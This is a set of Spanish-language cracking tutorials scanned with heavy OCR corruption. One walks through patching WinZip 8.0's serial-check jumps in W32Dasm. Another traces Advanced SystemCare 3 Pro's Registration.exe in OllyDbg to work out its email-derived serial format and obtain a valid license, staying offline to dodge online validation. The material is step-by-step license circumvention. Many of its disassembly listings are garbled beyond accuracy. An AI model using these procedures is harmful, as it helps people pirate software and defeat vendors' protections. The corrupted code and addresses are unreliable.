solamente 3 bytes, por lo ke creo ke es más cómodo. 


CONTACTO. 
Para comentarios, sugerencias, corrección de errores o dudas podeis poneros en contacto conmigo en: 


belzebuWanonima.com 


Un saludo de: 
Belzebú. 


Como crackear el Winzip 8.0 con el W32Dasm! 


Hola aca estoy de nuevo con mi ultimo tutorial, esta ves se tratara sobre como sacar la protección del winzip, este 
popular gestor de ficheros comprimidos. 


Bueno como ya sabemos lo primero a hacer es buscar la “Debilidad” de este programa. 
Una que le encontre, y que es la mas comun, es que cuando vamos a abrir el programa nos muestra unan nag box 


que nos dice que nos registremos, Presionamos en Enter Registration Code y ponemos un serial invalido, te muestra 
la siguiente dialog box. 


Bueno ahora que, ya sabes la debilidad, que es lo que podemos hacer?, buscar en las string references?, dale 
probemos a ver que pasa. Uhmm yo no lo encontre asi que vamos a buscarlo manualmente con la linterna (find) de 
el W32Dasm. Lo encontramos!!! 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
|:00407FAA(C), :00407FB3(C), :00407FBC(C) 


:00408005 E89C020000 call 004082A6 
* Possible Reference to String Resource I|D=00654: "Incomplete or incorrect information" 


| 
:0040800A 688E020000 push 0000028E 


:0040800F E8D9750300 call 0043F5ED 

:00408014 50 push eax 

:00408015 53 push ebx 

:00408016 6A3D push 0000003D 

:00408018 E808800200 call 00430025 

:0040801D 83C410 add esp, 00000010 

:00408020 FFO5F87A4800 inc dword ptr [00487AF8] 

:00408026 833DF87A480003 cmp dword ptr [00487AF8], 00000003 
:0040802D 0F85F9000000 ¡ne 0040812C 

:00408033 6A00 push 00000000 


Uhmmm examinando ese trozo de codigo veo que este mensaje es llamado desde 00407FAA(C), : 00407FB3(C), 
:00407FBC(C) y todos son condicionales o sea JE o JNE. Que curioso, vamos a ver. 
Apretamos el Boton de go to code location y aterrizamos aca: 


:00407F8F FF1528744700 Call dword ptr [00477428] 

:00407F95 56 push esi 

:00407F96 E8FF780300 call 0043F89A 

:00407F9B 56 push esi 

:00407F9C E822790300 call 0043F8C3 

:00407FA1 803D78CD480000 cmp byte ptr [0048CD78], 00 Tiene el nombre O letras? 
:00407FA8 59 pop ecx 

:00407FA9 59 pop ecx 

: 7459 je 00408005 Si tiene O se va al error!!! 

:00407FAC 803DA4CD480000 cmp byte ptr [0048CDA4], 00 Tiene nuestro S/ N O digitos? 
a 7450 je 00408005 Si tiene O se va al error!!! 

:00407FB5 E8S1BFAFFFF call 004079D5 RUTINA DE COMPROBACI ON PARA LOS QUE USAN SOFTI CE!!! 
:00407FBA 85C0 test eax, eax Uhmm testea. 

:00407FBC 7447 je 00408005 Si son iguales va al error 

:00407FBE 57 push edi 


Uhmm que casualidad los saltos estan uno casi alado del otro. Sera esta rutina importante? ; ) 


Si cambian esos saltos por JNE van a poder poner cualquier serial, pero no esta todo dicho!!! Figense iniciando de 
vuelta el winzip!!! Nos sale la nag!!!. 


Que podra ser? Uhmm vamos a mirar la call que genera el numero de serie: call 004079D5 


* Referenced by a CALL at Addresses: 
|:0040108B  ,:00401221 ,:004041E8 ,:00407FB5 ,:00433D12 


| 
:004079D5 55 push ebp 


:004079D6 8BEC mov ebp, esp 

:004079D8 81EC08020000 sub esp, 00000208 

:004079DE 53 push ebx 

:004079DF 56 push esi 

:004079E0 33F6 xor esi, esi 

:004079E2 803D78CD480000 cmp byte ptr [0048CD78], 00 
:004079E9 57 push edi 

:004079EA 0F849A000000 je 00407A8A 

:004079FO 8D45EC lea eax, dword ptr [ebp-14] 
:004079F3 50 push eax 


Bueno esta es la rutina que nos caga el Registro! 

Lo que tenemos que hacer es ir viendo que hay en cada una d las llamadas: 
* Referenced by a CALL at Addresses: 

|:0040108B  ,:00401221 ,:004041E8 ,:00407FB5 ,:00433D12 


ENTRAMOS EN 0040108B: 


:004010A7 C7400CC1020000 mov [eax+0C], 000002C1 
:004010AE 8D85D4FEFFFF lea eax, dword ptr [ebp+FFFFFED4] 
:004010B4 50 push eax 

:004010B5 E886680600 call 00467940 

:004010BA 8D85D4FEFFFF lea eax, dword ptr [ebp+FFFFFED4] 
:004010C0 682C010000 push 0000012C 

:004010C5 50 push eax 

:004010C6 E839E80300 call 0043F904 

NADA!!! 


ENTRAMOS EN 00401221: 


:00401221 E8AF670000 call 004079D5 
:00401226 85C0 test eax, eax 
:00401228 0F8573FFFFFF jne 004011A1 


Uhmmm esto me suena a comprobación!!! Cambiemos el JNE por JE!!! Ahora no es 75 por 74 sino 85 por 84!!!! 
Cuidado 


PROVAMOS SI NOS REGISTRA Y NO LOGRAMOS NADA!!! 
TONSES SIGAMOS! 


ENTRAMOS EN 004041E8: 


:004041E8 E8E8370000 call 004079D5 
:004041ED 85C0 test eax, eax 
:004041EF 7531 j¡ne 00404222 


Bueno espero que les haya sido util este manual, y que lo disfruten. 


Advanced SystemCare 3 Pro v3.1.2 E>=01/2009 


THE TRUTH IS OUT THERE 


THUNDER 


SEEK IT 


Un saludo una vez más para todos los listeros. En mi seguñido tutorial traté con una 
aplicación “Advanced WinCare Pro v2”, en la que vimos la manera de parchearla para 
quitarnos todas las limitaciones y poder usarla a full. En esa ocasión avisé que no era 
una versión muy nueva y cuando presente el tute a lista, alguien me comento que la 
última versión de la misma era la versión 3, por lo que habría mas trabajo para esta 
ultima. Bueno, me pareció interesante buscar su ultima actualización en la red y 
encontré este personaje “Advanced SystemCare 3 Pro v3.1.2”. Parece que le cambiaron 
un poco el nombre, pero siguen estando a cargo los muchachos de IObit. Además le 
añadieron varias cosas nuevas...en fin...por que no crackearla y compartir un tute, mi 
cuarto tut, esta vez actualizado, de dicha app??. Bueno, pues pensé que iba a tener mas 
trabajo, como me dijeron, pero lo que le añadieron de funcionalidad al programa no se 
lo añadieron de seguridad, pues fue relativamente fácil. Para trabajar con ella vamos a 
desconectarnos de la red por si las moscas, ya que, al igual que su antecesor, la licencia 
es validada en su pagina oficial. Nada, que espero que les guste y que se actualicen con 
esta ultima versión si no lo han hecho...jeje ;-p 


Aclarar que no soy un experto, solo un aprendiz con deseos de compartir lo que sabe y 
lo que aprende, por lo que le pido disculpas a los maestros si en algún momento(s) me 
equivoco o meto la pata en algo, o no hago las cosas de la mejor manera, discúlpenme, 
estoy aprendiendo, y sus criticas y consejos serán muy bien recibidos en todo momento. 


--->>>MISSION BRIEFING... 
Víctima: Advanced SystemCare 
Versión: v3.1.2 
URL: http: //www.iobit.com 
Protección: Serial 
Dificultad: Newbie 
Herramientas: RDG Packer vs OllyDbg y 
Compilador: Borland Delphi v6.0 - v7.0 
Cracker: Thunder 
Lugar/ Fecha: Cuba - 21/01/2009 


Advanced SystemCare 3 Pro v3.1.2 E>=01/2009 


--->>>VICTIM INFO... 


Congratulations! You have selected Advanced SystemCare v3, all-in-one system 
protecting, cleaning, repairing, and speeding up your PC. Advanced System 
introduces a new way to maintain your computer. With the advanced intuiti 
and state-of-art computer technology, your PC experience will be made truly elifferent. 
Note: Click here for detailed Advanced SystemCare v3 Help, whichas”available online. 
An Internet connection is required to visit Online Support Center. 4 


--->>>ATTACKING... 


Como les comente al principio, le añadieron unas cuantas cosas a esta'nueva versión, 
además le crearon una muy bonita interfaz. Bueno, a lo que nos interesa. La ejecutamos 
y nos sale la ventana principal. 


O Reparar Y Menu l Soporte 


Advanced SystemCare FREE 


Bienvenido! 


Limpieza 
Windows 


Prevencion 
y Mejora 


Utilidades 


* Gran Optimizacion 


Si vemos en la parte superior veremos que estamos en modo “FREE”, estando en este 
modo tendremos unas cuantas limitaciones. Bueno, vamos a hacer clic en “Personal”, en 
“Cuenta Usuario” y nos sale esta ventana. 


€ Actualizar Ahora 


Actualice a la Edicion Profesional 


Beneficios que podras obtener: 


+ El doble o triple de velocidad en tu viejo y lento PC 

+ Limpie y repare mas del 200% de errores del registro para mayor 
estabilidad 

+ Tunee el PC automaticamente para reproducir video, imagenes y 
MP3; editarlos y jugar al maximo rendimiento 

+ Aceleracion de Internet en Descargas, navegando jugando online, en 
videos de Youtube y todo al triple de velocidad 

+ Soporte Tecnico gratuito y uso comercial 


Que hay en la edicion profesional 


Introducir licencia ahora Registar Online | usar Edicion FREE 


Advanced SystemCare 3 Pro v3.1.2 E>=01/2009 


Esta es la ventana para introducir nuestros datos, para ello, hacemos clic en el botó 
“Introducir licencia ahora” y nos sale esta ventana en la que introducimos nuestros d; 
de costumbre. (Aunque no creo que con ese e-mail reciba mensajes...jeje) 


C Activacion 


Activar Advanced SystemCare Professional 


Introduzca la licencia y pulse "Activar Ahora" para activar 
todas las funciones de la Edicion Profesional. 


E-mail: thunderíOcrackslatinos.com 


Codigo de licencia87878787 


Activar Ahora 


| Cancelar | | Adquirir Online | 


Damos clic en “Activar Ahora” y 


Error al registrar 


A ¡Codigo de Cuenta Invalida! Compruebelo y vuelva a intentarlo, 


Parece que tenia razón y no se tragó el cuento del e-mail... ;-P . Bueno, parece que 
adivinando no vamos a lograr nada. Ahora, “A tirarle el Olly pa”rriba”...si, si, pero con 
calma, primero vamos a echarle una ojeada a la carpeta de instalación de la aplicación 
para ver si sacamos algo. 

OK, entre unos cuantos archivos veremos 
E (a | (a ld un ejecutable que nos llama la atención. 
Me refiero al “Registration.exe”. Bueno, si 
ejecutamos este susodicho, veremos que 


[Fa En "e! EN a nos sale una ventana de registro parecida a 


la anterior, pero con unas opciones de más. 
AutoCare,exe AutoSweep.... 4AWC,exe AWCInit.exe AwcSchedu... 


O O O KE 


ContextMe... CookiesBK,pln CoolTraylIco... Def.dbd ESR.exe 


 “ “0.0 


Backup Images Language News Skin 


y Registrar: Advanced SystemCare 


a Licencia del Autor 


Active su licencia para obtener las mejores prestaciones de Advanced SystemCare, Mientras 
no instale la licencia, mo obtentra las actualizaciones del programa ni acceso a la base de 
datos 


Instalar licencia 


Categoria de licencia: Sin registrar 
Codigo de licencia: 


Fecha caducidad: N/A 
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Damos clic en “Instalar nueva licencia” y nos sale una nueva ventana parecida 


e Registrar: Advanced SystemCare 


A Licencia del Autor 


Active su licencia para un completo funcionamiento de Advanced SystemCare Pro. 


E-mail : [thunderfOcrackslatinos.corm 


Codigo decencia: PEE 


Error alregistrar 


A Codigo de licencia invalido! Por Favor, intentelo de nuevo, 


< Atras(B) figuiente (> Cancelar 


Si seguimos el mismo procedimiento de registro, veremos que se comporta de la misma 
forma, por lo que, esto hace de este pequeño exe, un candidato perfecto para nosotros. 
Al parecer la aplicación principal utiliza esta otra en conjunto para la rutina de registro, 
cualquiera de las dos nos servirá, pero tomamos esta ya que es mas directo al no tener 
otra función que no sea registrar la app. Ahora si nos vamos con el RDG nos dice 


Noir ACKer SELecÍor VS as -=)x) 


CiArchivos de programa Obi Advanced SystemCare [Abrir | 


O 
Borland Delphi v6.0 - v7.0 Compilador 


Nada Detectado 


7 Posible ble 9 
oiadó A Al Frente [] 


Drigen Lenguaje: U.S. English + Inglés Y LEA” 1") Detectar 


0 Archivo Escaneado en 5,17 5eg. O MA * HB L |: fa Ja]a [5 ]6]7 [a Jm) 


Está compilado en Delphi y no esta empacado. Para estos quehaceres, lo mejor es, antes 
de acudir al Olly, pasarlo por el DeDe y ver que podemos sacar en claro, para después ir 
directo al grano. Así que lo abro en el DeDe y al abrirlo 


D? application compiled with runtime packages found ! 
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OK, ya estamos avisados. Cuando termina el análisis nos vamos a 


Classes Info | Units Info Forms Project | Exports 
'UnitName_ | ClassName | TFormi 


Events | Controls | [Show classes having no published met 


FormCreate 
TntLabel8MouseMove 


TntLabel8Mouseleave 
TntLabell 5MouselLeave 
TntLabell 5MouseMowve 


o uN 
TntLabell 5Click 


TntButton Click 


Vemos que esto es lo que estamos buscando, el evento OnClick del botón “Next (N)>”, 
por lo que copiamos la dirección del evento. Si seguimos mirando veremos dos 
sospechosas mas que son “TntEditl Change” y “TntEdit2Change”, que son los dos edits 
del e-mail y el serial, respectivamente, pero si los seguimos en el Olly, veremos que lo 
único que se hacen en estos eventos son verificaciones de texto y copiado de memoria, 
nada importante, por lo que nos ahorraremos el trabajo en el tute y nos vamos directo al 
principal. Ahora si lo cargamos en el OllyDbg y ponemos un BP en la dirección del 
evento clic del botón. 


£BEC 
B9 45000000 
5A 60 


PUSH EDI 

MOU DWORD PTR SS: [EBP-4],EAXx 
LEA EAX, DWORD PTR SS: [EBP-54] 
8B15 ECEG4701 MOV EDX, DWORD PTR DS: [47EDEC] Registra. B047E90F9 


LEA EAX, DWORD PTR SS: CEBP-114] 
MOU EDX, DWORD PTR DS: [<éct170.B52p324Syj rt 170.P5xp324Sysut i lsBTFOY 


20R EAX, ERX 

55 PUSH EBP 

68 S8E124800 [PUSH Registra. 0B48128E 

64: FF30 PUSH DWORD _PTR_FS: CEAXJ 

64: 8920 MOU DWORD PTR FS: [EAX],ESP 
8B45 FC MOU EAX, DWORD PTR SS: CEBP-4] 
386380 90030001 MOV EAX, DWORD PTR DS: [EAxX+390] 
Es BOSaFSFF 


TEST_EAX, EAX 


Damos Run o F9, repetimos los pasos para registrarnos y al dar clic en el botón 
“Siguiente (N)””, pararemos la ejecución en nuestro BP, ahora, de aquí en adelante 
vamos traceando con F8, a ver que encontramos. Pasamos varias líneas de código sin 
importancia además de algunos CALLS, hasta que llegamos a una parte de código bien 
peculiar, donde comienza a meterse con mi e-mail, exactamente a partir del CALL en la 
dirección 0048024B 


ES 281EF9FF CALL Resistra. BO412078 SACA EL E-MAIL 
8685 DCFEFFFÍ MOU EAX, DWORD PTR SS: LEBP-124] 
8095 EOFEFFFÍ LEA EDX, DWORD PTR_SS: [EBP-120] 


CONVIERTE DE UNICODE - ASCII 


PONE EN MINUSCULAS 
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este en mayúsculas. Seguimos traceando y llegamos al CALL en 0048028G. Vamos a 
entrar en el a ver que podemos sacarle. Traceamos unas cuantas líneas y llegamos a este 


CALL en 
55 PUSH EBP 


£BEC MOU EBP,ESP 

E9 04000000 |MOU ECX,4 

6A 60 PUSH B 

64 a PUSH_B 

49 

75 F9 JNZ SHORT Registra. 0047EC64 
51 PUSH ECX 

53 PUSH_EBX 

SEDA MOU EBX, EDX 

8945 FC MOU DWORD PTR SS: CEBP-4],EAXx 


MOU EAX, DWORD PTR SS: [EBP-4] 


20R EAX, ERX 
55 PUSH EBP 
68 7CED476B |PUSH Registra. 6B47ED?C 
64:FF30 PUSH _DWORD_PTR_FS: CEAX] 
64:8920 MOU DWORD PTR FS: [EAXJ],ESP 
3B55 FC MOU EDx, DWORD PTR SS: [EBP-4] 


TEST_EAX, EAX 

YE 2B 

3045 EC LEA EAX, DWORD PTR SS: [EBP-14] 
sa PL: 


8B45_FC 
Es EEZSFSFF CALL <JMP. fact 170. 6SystembRLStrAddRefS$aarnu> 
3300 


ES 290ED4700 |MOU EAX, Registra. 0047ED90 
nn CALL <JMP.Er+ 178. 6SystemBBLStrPostaaru> 


0047EC90. 


Vemos que va a buscar la posición de “algo” en una string, en este caso en mi e-mail. 


Por lo que entramos en el para ver que es lo que hace. 


DEC EDX 


E AL,BYTE PT DS: [ESIJ 


| INC ESI 
[SUB _ECX, EDX 


|REPNE SCAS BYTE PTR ES:[EDIJ 
[|MOU EBX, ECX 
[PUSH ESI 
H_EDI 
MOU_ECX, EDX 
REPE_CMPS BYTE PTR ES:[EDIJ,BYTE PTR DS:CESI] 
POP EDI 
[POP _ESI 
[MOV ECX,EBX 


[POP EDX 
|X0R EAX,EAX 


|[X0R EAX, EAX 


4 
4 


[POP EDX 
MOU EAX,EDI 
SUB EAX, EDX 
PNP FAT 


ED90]=40 ("R”) 


Do PAPAS 


Traceamos unas cuantas líneas y caemos aquí, donde pasa a AL el carácter 40 ((0). 
Luego, mas abajo en la dirección 40006F04 buscara dicho carácter en mi dirección de 
e-mail, por lo que deducimos que esta verificando que sea una dirección de e-mail 
valida, en caso que no lo encuentre, tomara el salto en 40006F06 y nos llevara por el 
mal camino (BAD BOY :-(), nosotros no tenemos problemas, pues somos unos 


muchachos conscientes y pusimos una dirección verdadera ¿? ;-P, 
qué seguimos adelante y salimos del CALL sin mayores problemas. 


SL 
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8B55 FC MOU EDX, DWORD PTR_SS: [EBP-4] 
Eo LenSEr CALL MP. bot 170. eSystenealIStr From Strsaarri7Systemellidestrine CONVIERTE ASCII - UNICODE 


O de EAX, DWORD PTR SS: CEBP-18] 
BA FFooBaBa |MOU EDX, FF 


ES 7988FAFF | CALL RegistranBa427530 SEPARA USER 
8B55 EC MOU EDX, DWORD PTR SS: CEBP-14] 
3045 FO LEA EAXx, DWORD PTR SS: [EBP-10] 
ES PERScab 


8D45 Fa LEA EAX,DWORÓ PTR SS: CEBP-10] 
8B55 FC MOU EDX, DWORD PTR SS: [EBP-4] 

ES 1925FSFF CALL <JMP. £at 170. 6SystemBeLStrLAsgsaarpun:v> 
8D45 F8 

58 


LEA EAX, DWORD PTR SS: [EBP-8] 
¡SH EAX 


CONVIERTE USER UNICODE - ASCII 


Du 
ER! 


6A aa 8 
8B45 FC MOU EAX, DWORD PTR SS: [EBP-4] 
50 PUSH EAX 

ES FSFEFFFF NIE 
SBDa MOU EDX,EAX 

8D45 E4 LEA EAX, DWORD PTR_SS: [EBP-1C] 

ES 2825FSFF CALL <JMP. tot 170. 6SystemBBLStrFromPCharsaarri7SystemBAnsiStrir 
3B45 E4 


MOU EAX, DWORD PTR SS: [EBP-1C] 
B9 04000090 a ECXx, 4 


BA 01000998 |MOU EDX, 1 
ES S625FSFF CALL <JMP. fat 170. ESystemBBLStrCopyiaary> 


an45 Fa FA FAX. AMARO PTR SS: PFRP-F1 


CREA STRING1 


Seguimos bajando y pasamos por un CALL que vuelve a convertir mi cadena a 
UNICODE, en la próxima llamada separa el user del e-mail, mas abajo convierte el user 
de UNICODE a ASCII nuevamente y por ultimo en el CALL de la dirección 
0047ECD9, se crea una nueva cadena con mi e-mail, no entrare en mayores detalles de 
lo que se hace aquí dentro, ya que no es el objetivo de este tut, además, la rutina de 
generación de esta string es bastante larga, así que se lo dejo a los que quieran hacerle 
un keygen.. ;-p,. Nosotros vamos a copiarla y a llamarle STRING1. Seguimos bajando y 
llegamos a una llamada idéntica, en la que se crea otra string, pero esta vez utiliza solo 
el user del e-mail para crearla, me refiero a la dirección 0047ED04. 


50 PUSH EAX lA 
ES FGFEFFFF | CALL-< MP E¿Routine: Handlenbec> CREA STRING1 | 
S8D0 MOU EDX, EAX 


8D45 E4 LEA EAX, DWORD PTR SS: [EBP-1CJ 

ES 2825FSFF CALL <JMP.tet 170. 6SystemBRLStrFromPChartagrri7SystemBAnsiStrir 
8845 E4 MOU EAX, DWORD PTR SS: [EBP-1C] 

B3 04000008 |MOU ECX,4 


BA 61000008 |MOU EDx, 1 
ES S625FSFF CALL <JMP. tat 170. 6SystemBBLStrCopyáaaru> 


8D45 F4 LEA EAX, DWORD PTR SS: CEBP-C] 
58 PUSH EAX 

6A an PUSH_8 

8845 FO MOU EAX, DWORD PTR SS: CEBP-10] 

58 PUSH EAX 

ES CBFEFFFF | CALL <JMP.2SRoutine.HandleDec> CREA STRING2 
SEDO MOU EDX, EAX 


8045 ED LEA EAX, DWORD PTR_SS: CEBP-20] 
ES FOZ4FSFF CALL <JMP. tot 170. eSystembRLStrFromPChartaarri7SystemBAnsiStrir 
8845 EN 


MOU EAX, DWORD PTR SS: [EBP-20] 
B9 640000908 |MOU ECX,4 
BA 61000008 


MOU EDX, 1 
ES SB2SFSFF CALL <JMP.tart 170. ESystemBRLStrCopyiagru> 


FF?S FS 
68 _9CED4700 |PUSH Registra. B047ED9C 
FF?S F4 RD 


: [EBP-CJ 
8D45 DC LEA EAX, DWORD PTR SS: [EBP-24] Y 
RBA ASARARAR 1 MAL FOxX.2 


Copiamos esta string y le llamamos STRING2. Seguimos dándole a nuestro querido FS 
y llegamos a esta parte de código donde se toman los primeros cuatro bytes de 
STRING1 y los primeros cuatro bytes de STRING2. 
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BA 1099098 |MOU EDX, 1 pa. 
ES SB25FSFF CALL <JMP. tot 170. 6SystembRLStrCopysaaru> 

FF75 F8 PUSH DWORD PTR SS: LEBP-81 COJE PRIMEROS 4 BYTES DE STRING1 
68_9CED4700 |PUSH Registra. 1047ED9C 

FF75 F4 PUSH_DWORD PTR SS: [EBP-C1 COJE PRIMEROS 4 BYTES DE STRING2 


8D45 DC LEA EAX, DWORD PTR SS: [EBP-24] 
BA 03000008 |MOU EDx,3 


Es 1B25FSFF CALL <P ter 170. eSystenBOLsrrCatiiaarv) Los UNE CON UN - 
8B45 DC OU EAX, DWORD PTR SS: [EBP-24] 

2BD3 MOU EDX, EBX 

ES S12FFSFF CALL <JMP, fat 170. GSysut i lsGUpperCasesaari17SystenBAnsiString> 

3309 XOR EAX,EAX 

SA POP EDX 

59 POP ECX 

POP ECX 

MOU DWORD PTR FS: [EAX],EDX 


64:38910 
68 83ED4700 |PUSH_Registra.18047ED083 
8D45 DC od pa PTR SS: [EBP-24] 


BA 6300000 | Mi 

ES 2724FSFF CALL <JMP. tot 178. BSystemBBLStrArrayC Ir$garpvi> 
8D45 Es LEA EAX,DWORD PTR SS: [EBP-18] 

BA 62000008 |MOU EDX, 2 

ES 4M2SFSFF CALL <JMP.tort 178. BSystemBRUStrArrayC lrsagrovi> 
8D45 FA 


LEA Pa PTR SS: [EBP-10] 


BA 64000008 |MOU ED: J 
ES SD24FSFF CALL <4ñP. tot 170. SystenBBLStrArrayC lrsgarpvi> Y 


Luego, en la llamada de 0047ED38, los concatena con un guión enel medio, quedando 
en nuestro caso la string F069-5C76, a la cual llamaremos; STRING3. De esta forma 
llegamos al RET de la función y seguimos traceando. 


5 +. 8B25 DSFEFFFI MOU EAX, DWORD PTR SS: [EBP-128] | 
2BC|_. 302 | 0R_EDX, EDXx 

SB2BE . ES 7D1OFSFF 

«v BFS5 SADOBBA! 

+ SB45 FCO. [MOV EAX,DWORD PTR SS: [EBP-4] 


DDD DDD ADO 


En la dirección 004802BE, se verifica que el e-mail no sea una cadena nula, en caso 
contrario nos saltaría al chico malo. Nosotros tomamos el salto JNZ, por lo que 
evitamos el mensaje y continuamos. Mas abajo, pasamos una llamada que me saca el 


serial que ingresamos 
2b94 H940349041 MUU Ex, UWORO PIR US: LEHX+3H4 J 


| ES 111DF9FF | CALL Registra:D0412078 SACA SERIAL FALSO 
- 8B95 CSFEFFFIMOU EDxX,DWORD PTR SS: LEBP-138] / 
. B3 A4124300 |MOU EAX,Registra. 1048124 
Es ESBFFSFF 
TEST EAX,EAX 


GA NERO AT, 


Y mas abajo vemos una llamada parecida a la anterior que buscaba el caracter 40 ((W) 
en mi dirección de e-mail, pero esta vez va a buscar algo en mi serial falso, entremos 
para ver que es lo que busca...y ver si podemos ayudarle a encontrarlo...jeje 


4A DEC _EDX A |Registers (FPUJ 


78 20 A E Registra. O 
66: 8806 ¡MOU AX, WORD PTR DS: [ESI] : 
8306 12 ADD ESI,2 


2901 SUB ECX,EDX 
7E 16 JLE SHORT rt 170.49907795 


E2166:AF REPNE SCAS WORD PTR ES: [EDI] 
1 «NZ SHORT rt 178.40097795 
89CB MOU EBX, ECX 
56 PUSH ESI 
57 PUSH_EDI 
3901 MOU_ECX, EDX 
F3:66:A7 REPE_CMPS WORD PTR ES:[EDIJ,WORD PTR DS: [ESI] 
SF |POP EDI 
|POP_ESI 


| MOU_ECX, EBX 


ste caso buscara el carácter 2D (-) en mi serial, y en caso de no encontrarlo me 
viafa reportado al chico malo por el salto JNZ en 40007782, así que ponemos un BP 
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Damos clic en el botón y caemos nuevamente allí, esta vez, pasaremos sin problemas 1 
ion bueno, llegamos al RET y salimos a la función principal. 
- ES 4124800 |M0U EAX, Registra. 0048124 
[ES ESOFFSFF CALL <MP.Ert lO. 6SystemenustrPostagru> 
. Eon TEST EAX,EAX 
DONE cdi LEA EDXxX, DWORD PTR SS: CEBP-140] 


MOV EAX, DWORD PTR SS: [EBP-4] 


» 


Allí vemos que no tomamos el salto, por lo que estaremos bien > mas. Le 
EOS dando a la teclita FS y pasamos varios CALLs y llegamos a-otra comparación. 


8D95 C4FEFFFÍ LEA EDX, DWORD PTR SS: [EBP-130] 
ES 8819FSFF 

888 CAFEFFFI HOY ERA DWORD ETE 551 LEBRALSO] 

mea [CALL <JMP. oct 178. BSystembRlIStrLentagrk17SystenBlideString> SACA LEN(SERIAL) 
o en | LENGHT(SERIAL)==19 


Sara 1 
DeS4 Sñanoda 
8B4s FC OU EAX, DWORD PTR SS: CEBP-4] 
SBeD Adasanal MOU EAX, DWORD PTR DS: CEAX+3A4] 
Bol 7 810 | OU EDX, DWORO_PTR_DS: CEAX] 
l FF92 C400000 

8Bás FC | MOU EAX, DWORD PTR SS: LEBP-3] 
eso Ada3000l MOV EAX, DWORD PTR_DS: CEAX+3M4] 


ES B929FSFF 
3B EAX, DWORD PTR SS: CEBP-4] 


A PA 


45 FC | mou 
2880 Adazanal mou EAX, DWORD PTR DS: CEAX+3A4] 
8B15 B41C4901 MOV EDX, DWORD PTR DS: [491084] 


ES FOSSFSFF CALL <JMP.£4cL70.BControlséTControlBSetCo lor$aariSGraph icsBTCc 
ñA 2 | 


PUSH 34 


En esta segunda llamada se obtiene la longitud de mi serial falso y se compara con 13 
(19 en decimal), de lo que deducimos que nuestro serial tiene que tener 19 caracteres, 
nosotros no pasaremos la verificación, ya que solo tenemos 9, así que ponemos un BP 
aquí, damos run, aceptamos una vez mas el cartel de error e insertamos un nuevo serial, 
ahora será 8787-8787-8787-8787. Damos clic en el botón de continuar y ahora si 
tomamos el salto sin problemas, lo que nos evitara caer en el chico malo. Volvemos al 
traceo y llegamos a esta parte 


ose HSPER | LEA EDX, DWORD PTR SS: [EBP-158] 
8B95 ASFEFFFIMOU EDx,DWORD PTR 55 [EBP-158] 


CONVIERTE UNICODE - ASCII 


UCASE(SERIAL) 
8B35_BOFEFFFI Ta ER a PTR SS: [EBP-150] 
E9 090BB00a 


Aquí convierte mi serial de UNICODE a ASCII nuevamente (no se por que pasa tanto 
de uno a otro ¿?) y un CALL mas abajo lo pone todo en mayúsculas. Unas líneas mas 
paria a vemos que hay una llamada que separa mi serial 


ES DFODFSPF MOS CO A 


IZ SACA PRIMER PAR 
. Sese RSFEFFF MOU EAX, DWORD PTR SS: [EBP-14C0] 
. 8B55 FS MOU EDx, DWORD PTR SS: [EBP-8] 

ES B1BDFSFF 


.v BFS4 SABOBan 

. 8B45 FC MOU EAX, DWORD PTR SS: CEBP-4] 
2639 A4030001 MOV EAX, DWORD PTR DS: [EAX+3A4] 
2B10 MOU EDX,DWORD_PTR DS: [EAX] 
FF92 C4000001 


8B45 FC OU EAX, DWORD PTR SS: [EBP-4] 
28630 A4030001 MOV EAX, DWORD PTR DS: [EAX+3A4] 


ES BS28FSFF 

8B45 FC MOU EAX, DWORD PTR SS: [CEBP-4] 
2630 A4030001 MOV EAX, DWORD PTR DS: [EAX+3A4] 
ESE EN MOU EDX, DWORD PTR DS: [491CB4] 


£A 30 

308D_AGOFEFFFI LEA ECx, DWORD PTR SS: [EBP-166] 
BA 67000808 [MOV EDX, 7 

Ai Co1C4908 [MOU EAX, DWORD PTR DS: [491CC8J 
£B18 MOU EBX,DWORD_PTR DS: [EAX] 


FFS3 BC 
ABRAS RAFFFFFL MO FAX. AMARA PTR SS: PFRP-1441 


a 
[- 
117) 
AL] 
pa 
o 


o EA 
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BA 61060608 [MOV EDx, 1 
ES DFODESFF 
.  8B85 B4FEFFFI MOV EAX, DWORD PTR SS: CEBP-14CJ 
- 8B55 FS MOU EDX, DWORD PTR SS: [EBP-8] 
« ES B19DFSFF 
.v BFS4 SABOBOO 


SACA PRIMER PAR 


MOU EAX, DWORD PTR SS: [EBP-4] 


8B45 FC 
3839 A4030001 MOU EAX, DWORD PTR DS: CEAX+3A4] 
MOU EDX, DWORD PTR DS: [EAX] 


2B10 

FF92 C40000a: 

8B45 FC MOU EAX, DWORD PTR SS: CEBP-4] 
28389 A4030001 MOV EAX, DWORD PTR DS: [EAX+3A4] 


ES BS28FSFF 
8B45 FC MOU EAX, DWORD PTR SS: CEBP-4] 
2630 A4030001 MOU EAX, DWORD PTR DS: CEAX+3A4] 


38815 E41C4901 MOU EDXx, DWORD PTR DS: [491CB4] 
ES FCS4FSFF CALL <JMP.£ucL70.GControlsGTControlBSetCo lorsaariSGraph icseTCc 


£A 30 PUSH_38 

303D_AGFEFFFI LEA ECxX,DWORD PTR SS: CEBP-160] 
BA 670009808 (MOV EDX, 7 

Ai Co1Cc4908 [MOU EAX,DWORD PTR DS: [491CC0] 
3B1S MOU EBx, DWORD PTR DS: [EAX] 


FFS3 BC 
BR85 DAFFFFFÍ MANU FAX. MINRA PTR SS: PFRP-1641 


En el de abajo se pasa a EDX STRING3 y en el CALL siguiente se van a comparar dos 
strings....adivinas cuales???? :-P 


ASCII ”"FO69-5C76” 


Si, parece que tenías razón...jeje. En caso que dichas cadenas no sean iguales no se 
tomara el salto siguiente y se llegara al chico malo, por lo que nosotros vamos a poner 
un BP aquí, vamos a dar F9, aceptamos el mensaje y cambiamos nuestro serial una 
ultima vez, ahora será F069-5C76-8787-8787. Volvemos a aceptar y caemos en la 
comparación, esta vez, al ser iguales las cadenas, tomara el salto, el salto que nos llevara 
a las nubes... %-D. Damos F9 y 


e Registrar: Advanced SystemCare 


| -), Licencia del Autor 


Advanced SystemCare Pro esta validando su licencia ahora. 


af Validacion de la Licencia... Finalizado! 


Validacion Online... 


Network Problem 


Q Cannot connect to our server, please check your network/proxy settings and try to 


walidate your license later, 


Atras Finalizar 


Como vemos nos dice que la validación de la licencia ha finalizado, aunque ha fallado 
la validación Online (por supuesto). Bueno, para salir de dudas, vamos a cerrarlo y 
os ala aplicación principal a ver que nos dice. Cerramos Olly y ejecutamos 


F 


“10 
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O Reparar Y menu 


Advanced SystemCare 'PRO 
Ver 3.1.2 
Bienvenido! 


Limpieza 
Windows 


p Prevencion 
